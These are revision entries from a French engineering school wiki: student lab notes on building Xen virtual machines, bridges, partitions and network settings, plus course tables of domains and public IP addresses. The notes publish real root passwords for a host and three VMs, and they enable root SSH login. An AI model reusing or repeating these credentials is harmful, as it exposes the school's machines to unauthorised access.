<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:B0Jej6oBYnqo6BNAkuT73+1FRTAu7w+ynwLcL9MUw84 (DSA)<br />
SSH Fingerprint : SHA256:Ko3kxxNtx498I5wyPFzNF2StKYL4tOvV0vHbRyggX6g (ECDSA)<br />
SSH Fingerprint : SHA256:QPTYZy5CwrYDXRgiQsx/suQfg6af4dqxzA5ySj35/k4 (ED25519)<br />
SSH Fingerprint : SHA256:Z3zPgtowyJ1xXzc4MS2Iugy2rsO/7Gsmwm93OLV3yUE (RSA)<br />
Root Password : FDigbGcTyh86QnvLWyT8wh3<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.1/24<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 193.48.57.166/24<br />
gateway 193.48.57.162<br />
iface eth1 inet6 auto<br />
</syntaxhighlight><br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH ====<br />
(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight><br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&diff=11457
SE4 IdO sécurité système/réseau 2025/2026
2026-01-27T13:46:11Z
<p>Cpayet : /* Répartition des binômes pour les travaux pratiques "administration système et réseau" */</p>
<hr />
<div>= Répartition des binômes pour les travaux pratiques "administration système et réseau" =<br />
<br />
Préfixe des noms de machine : <code>SE4</code>.<br />
<br />
Domaines Internet à louer sur [[gandi.net]]. Identifiant <code>pifou</code>. Regardez le montant prévu sur le compte avant de louer un domaine.<br />
<br />
{| class="wikitable"<br />
! Cahier !! Elève !! Nom de domaine<br />
! Nom de machine de services !! Nom de machine mandataire<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinuxbtw.lol|| SE4.CachyOS||SE4.LinusTorvalds<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || c2vts.fr|| SE4.C2||SE4.Garage<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || rs7.online|| SE4.RS7||SE4.Garage<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman<br />
|-<br />
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice<br />
|-<br />
|}<br />
<br />
{| class="wikitable"<br />
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves <br />
|-<br />
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI & Agathe HOUDUSSE<br />
|-<br />
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI & Marin GOURVEST<br />
|-<br />
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET & Thomas DELOBELLE<br />
|-<br />
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI & Yassine YAHIANI <br />
|-<br />
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE & Tom MERIEN<br />
|-<br />
| SE4.superman|| 193.48.57.169|| Billel Cheklat & Antonin Biernacki<br />
|-<br />
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse & GAUTHIER Mario Sylainx S.<br />
|-<br />
| SE4.Solstice|| <code>193.48.57.167</code>|| Mohamed Salhi <br />
|-<br />
|}<br />
<br />
= Tableau des commutateurs virtuels =<br />
<br />
{| class="wikitable"<br />
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé <br />
|-<br />
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24<br />
|-<br />
|PAYET / DELOBELLE<br />
|pont_pacman<br />
|192.168.10.0/24<br />
|-<br />
|MERIEN / VANGHELUWE<br />
|pont_pere<br />
|192.168.0.0/24<br />
|-<br />
|CHEKLAT / BIERNACKI<br />
|pont_ironman<br />
|192.168.69.0/24<br />
|-<br />
|SALHI<br />
|pont_msalhi<br />
|192.168.20.0/24<br />
|-<br />
|GOURVEST/GHAZALI<br />
|pont_diviseur<br />
|192.168.67.0/24<br />
|-<br />
|YAHIANI / TEPELI<br />
|pontclio<br />
|192.168.7.0/24<br />
|-<br />
|GAUTHIER / SOUOP METSE<br />
|pont_rock<br />
|192.168.50.0/24<br />
|}<br />
<br />
= Tableau des réseaux virtuels =<br />
<br />
VLAN privés :<br />
<br />
{| class="wikitable"<br />
! Nom !! Numéro <br />
|-<br />
| VLAN1 || 1<br />
|-<br />
| MV-PROMO || 2 <br />
|-<br />
|}<br />
<br />
VLAN communs avec l'école :<br />
<br />
{| class="wikitable"<br />
! Nom !! Numéro <br />
|-<br />
| INTERCO1 || 530 <br />
|-<br />
|}<br />
<br />
= Schéma de câblage =<br />
<br />
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.<br />
<br />
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.<br />
<br />
= Plan d'adressage =<br />
<br />
{| class="wikitable"<br />
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 <br />
|-<br />
| MV-PROMO || <code>193.48.57.160/27</code> || </code>2001:660:4401:60a0::/64</code><br />
|-<br />
|}<br />
<br />
Adresses IPv4 des éléments réseau dans VLAN1<br />
<br />
{| class="wikitable"<br />
! Elément !! Adresse <br />
|-<br />
| Routeur C9200-E304 || 172.27.0.1/16<br />
|-<br />
| Routeur C9200-E306 || 172.27.0.2/16<br />
|-<br />
| Borne Wi-Fi E306 || 172.27.0.3/16<br />
|-<br />
| Borne Wi-Fi E304 || 172.27.0.4/16<br />
|-<br />
|}<br />
<br />
= Informations VRRP =<br />
<br />
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.<br />
<br />
== VLAN des machines virtuelles ==<br />
<br />
Une seule instance VRRP dans le VLAN des machines virtuelles.<br />
<br />
Adresse IPv4 virtuelle : <code>193.48.57.162</code><br />
<br />
{| class="wikitable"<br />
! Routeur !! IPv4 propre <br />
|-<br />
| C9200 E304 || <code>193.48.57.163</code><br />
|- <br />
| C9200 E306 || <code>193.48.57.164</code><br />
|-<br />
|}<br />
<br />
== VLAN ... ==</div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=11452
Atelier SysRes SE4 2025/2026 E5
2026-01-27T13:34:59Z
<p>Cpayet : /* Machines de Service - CachyOS & Manjaro */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : g0llum_fr0d0<br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:B0Jej6oBYnqo6BNAkuT73+1FRTAu7w+ynwLcL9MUw84 (DSA)<br />
SSH Fingerprint : SHA256:Ko3kxxNtx498I5wyPFzNF2StKYL4tOvV0vHbRyggX6g (ECDSA)<br />
SSH Fingerprint : SHA256:QPTYZy5CwrYDXRgiQsx/suQfg6af4dqxzA5ySj35/k4 (ED25519)<br />
SSH Fingerprint : SHA256:Z3zPgtowyJ1xXzc4MS2Iugy2rsO/7Gsmwm93OLV3yUE (RSA)<br />
Root Password : FDigbGcTyh86QnvLWyT8wh3<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<syntaxhighlight lang="shell"><br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.1/24<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 193.48.57.166/24<br />
gateway 193.48.57.162<br />
iface eth1 inet6 auto<br />
</syntaxhighlight><br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH ====<br />
(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.1.0/24<br />
</syntaxhighlight><br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=11437
Atelier SysRes SE4 2025/2026 E5
2026-01-26T11:25:33Z
<p>Cpayet : /* SSH */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : g0llum_fr0d0<br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:B0Jej6oBYnqo6BNAkuT73+1FRTAu7w+ynwLcL9MUw84 (DSA)<br />
